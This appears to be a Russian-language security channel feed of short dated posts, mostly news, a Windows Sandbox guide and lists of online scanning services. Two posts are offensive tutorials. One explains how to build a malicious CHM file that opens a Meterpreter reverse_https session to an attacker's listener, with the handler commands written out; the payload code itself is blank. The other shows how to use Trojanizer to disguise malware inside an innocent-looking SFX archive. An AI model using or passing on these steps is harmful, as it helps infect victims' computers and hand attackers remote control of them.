CODE RED

2021-02-09 11:00:49 ​​Как безопасно открыть подозрительный софт в Windows?

Случалось ли Вам оказаться в ситуации, когда необходимо запустить какую-то программу, но Вы не совсем уверены в источнике её происхождения? А вдруг это вредонос? Или другой пример — необходимость проверить что-то на «чистой» версии Windows. Во всех подобных случаях раньше был только один выход — установить ОС на отдельную физическую или виртуальную машину и провести нужный эксперимент.

Думаю, не у всех вызывает восторг постоянно запариваться с дедиками и виртуалками. Мало кто знает, что Microsoft разработала собственную песочницу для Windows 10, которая позволяет запускать приложения в безопасном изолированном окружении.

Запустите Панель управления.
Откройте раздел "Программы и компоненты".
Нажмите на пункт "включение и выключение компонентов Windows".
Выберите "Песочница Windows" и нажмите "ок".
Перезагрузите ПК, в меню должно появиться приложение "Windows sandbox".
Для проверки программы скопируйте файл из основной системы в песочницу.
Установите и запустите приложение в песочнице.

Даже при наличии вирусов, они не смогут проникнуть в основную систему и не нанесут значимый вред. Но учтите, что при закрытии песочницы файл сотрется!

#интересноеиполезное Открыть/Комментировать

2021-02-08 10:30:12 ​​В Google Chrome заблокировали очень популярное расширение The Great Suspender

Google заблокировала популярное расширение The Great Suspender для браузера Chrome и удалила его из интернет-магазина Chrome. Это расширение позволяло выключать неиспользуемые вкладки, чтобы оптимизировать работу браузера.

Пользователи The Great Suspender получили оповещение о том, что расширение содержало вредоносное ПО. Сообщается, что расширение в конце 2020 года продали неизвестной компании, а она добавила в него эксплойт. Он позволял выполнять код без ведома пользователя. Данное расширение, кстати, уже удалили и из Microsoft Edge.

The Great Suspender довольно быстро стало популярным, поскольку браузер Chrome потребляет много ресурсов, а расширение позволяло заменять неактивные вкладки пустым серым экраном, экономя ресурсы. Сообщается, что после блокировки многие пользователи потеряли неиспользуемые вкладки, которые были им нужны.

#новости Открыть/Комментировать

2021-02-07 11:00:49 ​​Подборка ресурсов для проверки уровня личной приватности и безопасности в сети

Проверки приватности и безопасности в сети нужно делать регулярно. Для вашего удобства мы сделали подборку с самыми полезными ресурсами из этой сферы.

Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт:

http://checkshorturl.com
https://unshorten.me/
http://www.untinyurl.com

Проверка анонимности web-серфинга:

https://proxy6.net/privacy
http://proiptest.com/test/

Проверка твоего Web browser на безопасность (security bugs, malware addons, etc):

https://browsercheck.qualys.com/
https://www.comss.ru/page.php?id=1408

Экспресс-онлайн проверка безопасности вашего десктопа от фишинга, уязвимостей ПО, утечки sensitive data и т.д.

http://www.cpcheckme.com/checkme/

Проверка хостовой IDS\IPS и end-point Firewall:

http://www.hackerwatch.org/probe/
http://www.t1shopper.com/tools/port-scan/

Онлайн-антивирусы:

https://www.virustotal.com/ru/
https://online.drweb.com/

Онлайн-песочницы:

https://threatpoint.checkpoint.com/ThreatPortal/emulation
https://www.vicheck.ca

#полезное Открыть/Комментировать

2021-02-06 10:30:01 ​​Приложение МВД может получить доступ к контактам пользователей

МВД объявило тендер на доработку мобильного приложения 4 февраля — победитель будет объявлен 1 марта. Он должен интегрировать модуль «Антимошенник» для распознавания звонков с мошеннических номеров.

Как следует из тендерной документации, с которой ознакомился «Коммерсант», приложению потребуется доступ к телефонной книге пользователя. Модуль будет соединяться с информационной системой полиции через сторонний сервис. При звонке с неизвестного номера приложение будет сопоставлять его со списком мошеннических номеров правоохранителей и предупредит в случае совпадения.

Инициатива МВД уменьшит объем телефонного мошенничества, признает директор центра Solar appScreener компании «Ростелеком-Солар» Даниил Чернов. Но эксперт недоумевает, зачем приложению, обрабатывающему только входящие вызовы, доступ ко всем контактам телефона. В этом случае оно может работать как скандальный сервис Get Contact, обещавший пользователю показать, как он записан в телефонных книгах разных людей, но в реальности собиравший базу номеров.

Инициатива также несет риски злоупотреблений и утечки данных, поскольку их обработка будет происходить на сторонних серверах, уточняет глава отдела информационной безопасности «СерчИнформ» Алексей Дрозд.

#новости Открыть/Комментировать

2021-02-05 11:01:20 ​​Вирус в CHM файле

HTMLHelp (CHM) - это формат файлов Windows выпущенный в 1997 году, представляет из себя комплекс сжатых HTML страниц и используется для предоставления различной информации пользователям программ, к примеру.

В данные файлы можно интегрировать VBScript или JavaScript код, что открывает возможность для создания вредоносного CHM файла, путем добавления в разметку кодового блока с пейлоадом, чем мы сегодня и займемся.

Создание вредоносного файла

Для начала скачаем компилятор htm2chm. С помощью него мы сможем создавать CHM файлы из обычных HTML страниц.

Далее создаем .html файл, со следующим кодом







Подставляем нужные значения ip адреса и порта, после чего компилируем файл. Открываем htm2chm, нажимаем "Compiler", в поле Folder выбираем папку с созданным файлом, жмем "Start".

Проведение атаки

Перед запуском зараженного файла на ПК жертвы необходимо подготовить meterpreter.

Прописываем в терминале Kali Linux ряд команд поочередно

-q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set LPORT <порт>

Подставляем нужные значения, и как только на целевом ПК откроется вредоносный файл, в терминал моментально прилетит открытая сессия.

#хакинг #вирусы

4.5K views08:01

Открыть/Комментировать

2021-02-04 10:50:00 ​​Роскомнадзор опубликовал пирамиду цифровых угроз

Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) опубликовала в среду «пирамиду современных взаимосвязанных сетевых угроз, вызванных применением цифровых технологий на семи уровнях информационного пространства».

Семь уровней, по классификации Роскомнадзора, от основания пирамиды до вершины, это сетевое оборудование; маршрутизация; обработка данных; сервисы; вредоносная информация; общественно-опасная информация; фейки, цензура.
На каждом уровне, кроме верхнего, отдельно выделяются источники угроз и собственно угрозы.

Как поясняет ведомство, в основе пирамиды лежат угрозы сетям связи, интернет-маршрутизации и конфиденциальности данных. На вершине — контентные и смысловые угрозы, связанные общественным сознанием.

#новости Открыть/Комментировать

2021-02-03 11:00:42 Главные новости индустрии информационной безопасности в обзоре от главного редактора SecurityLab Александра Антипова.
В этом выпуске:
- Что придумали северокорейские хакеры для распространения вредоносных программ
- Как камеры для домашней безопасности стали инструментом для шпионажа
- Какие уязвимости устранила Apple в iOS, iPadOS и tvOS
- И новость недели - как производитель продуктов для защиты информации пострадал от своих же продуктов

Смотреть выпуск -> http://bit.ly/3pJwGOP Открыть/Комментировать

2021-02-03 09:00:55 ​​SPARTA. Программа для пентеста с графическим интерфейсом

SPARTA это предустановленная в Kali Linux утилита для тестирования сетевой инфраструктуры на проникновение. В отличие от подобных фреймворков SPARTA имеет графический интерфейс, что значительно упрощает процесс пентеста новичкам. Рассмотрим её подробнее.

Установка

Как уже было сказано ранее, SPARTA предустановлена в Kali, однако в случае её отсутствия, утилиту можно установить командой

clone https://github.com/secforce/sparta.git

Предварительно установив необходимые зависимости: Nmap, Hydra и CutyCapt.

Использование

Открыть программу можно введя в терминале sparta.

Откроется окно, в левой панели которого можно добавить ip адрес, или их диапазон, для сканирования.

Сразу же после добавление начнется сначала сканирование nmap на открытые порты.

По мере сканирования при обнаружении портов 80 или 443 в процесс включится nikto, который произведет аудит развернутого на хосте вебприложения.

По мере завершения сканирования, в правой части окна программы вы увидите списком открытые порта каждого хоста с информацией об установленных на них сервисах.

Через SPARTA можно также запускать брутфорс роутеров, админ панелей камер видеонаблюдения и т.д. Открыть/Комментировать

2021-02-02 11:35:02 ​​Склейка зловреда с безопасным файлом

Про склейку вируса с обычным файлом посредством SFX архива знают многие, однако вручную проводить этот процесс довольно неудобно. Нужно подготовить BAT файл, который правильно запустит остальные компоненты архива, настроить сам архив и т.д. Куда проще это делается с помощью программы Trojanizer.

Установка

Скачиваем репозиторий

clone https://github.com/r00t-3xp10it/trojanizer.git

Переходим в созданную папку и запускаем утилиту


При первом запуске Trojanizer установит необходимые зависимости. Если при этом процессе появятся ошибки и некоторые комплектующие не удастся установить, то это можно сделать вручную. Вот все необходимые вспомогательные программы: Wine Program Files, WinRAR Software и Zenity.

Использование

После установки зависимостей и непосредственного запуска программы откроется первое окно, в котором необходимо выбрать вирус.

Во второй форме, нужно соответственно выбрать программу, с которой будет производиться склейка.

После чего в соответствующих окнах вводим название SFX архива и выбираем иконку.

Готово. Последнее окно покажет путь до сгенерированного файла

#вирусы #хакинг Открыть/Комментировать

2021-02-01 11:30:06 ​​Microsoft обновит Windows 10 летом 2021 года

Американская корпорация Microsoft определилась со сроком релиза новой версии операционной системы Windows 10 21H1 — выпуск намечен на лето 2021 года.

Сроки релиза новой версии Windows 10 стали достоянием общественности благодаря официальной документации Microsoft, содержавшей соответствующую информацию. Ранее ожидалось, что новая версия выйдет в конце весны.

Утечка информации, впрочем, не противоречит прогнозам майского анонса обновления Windows 10. Предполагается, что новая версия операционной системы выйдет в виде пакета обновлений. Обновленные функции можно будет разблокировать при помощи специального ключа.

#новости Открыть/Комментировать